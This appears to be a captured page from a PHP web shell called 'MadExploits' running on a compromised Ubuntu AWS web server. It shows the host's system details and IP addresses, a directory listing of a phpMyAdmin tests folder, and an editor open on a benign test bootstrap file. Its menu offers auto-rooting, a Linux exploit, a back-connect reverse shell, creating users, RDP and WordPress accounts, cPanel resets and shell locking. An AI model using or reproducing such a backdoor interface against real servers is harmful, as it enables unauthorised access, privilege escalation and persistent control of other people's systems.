Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.147.69.134
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
restaurants /
var /
phpmyadmin /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
end-to-end
[ DIR ]
drwxr-xr-x
javascript
[ DIR ]
drwxr-xr-x
stubs
[ DIR ]
drwxr-xr-x
test_data
[ DIR ]
drwxr-xr-x
unit
[ DIR ]
drwxr-xr-x
README.rst
2.76
KB
-rw-r--r--
bootstrap-dist.php
829
B
-rw-r--r--
bootstrap-static.php
936
B
-rw-r--r--
ci-phplint
310
B
-rwxr-xr-x
config.e2e.inc.php
276
B
-rw-r--r--
doctum-config.php
894
B
-rw-r--r--
nginx.conf
3.63
KB
-rw-r--r--
php-fpm.conf
308
B
-rw-r--r--
php.ini
71.63
KB
-rw-r--r--
phpstan-constants.php
218
B
-rw-r--r--
start-local-server
1.7
KB
-rwxr-xr-x
stop-local-server
1.08
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bootstrap-dist.php
<?php declare(strict_types=1); // phpcs:disable PSR1.Files.SideEffects define('PHPMYADMIN', true); define('TESTSUITE', true); if (! defined('ROOT_PATH')) { define('ROOT_PATH', dirname(__DIR__) . DIRECTORY_SEPARATOR); } if (! defined('TEST_PATH')) { // This is used at Debian because tests // can be in a different place than the source code define('TEST_PATH', ROOT_PATH); } /** * Set precision to sane value, with higher values * things behave slightly unexpectedly, for example * round(1.2, 2) returns 1.199999999999999956. */ ini_set('precision', '14'); // Let PHP complain about all errors error_reporting(E_ALL); // Ensure PHP has set timezone date_default_timezone_set('UTC'); require_once ROOT_PATH . 'app/constants.php'; require_once AUTOLOAD_FILE;// Some phpunit configurations will need it
Close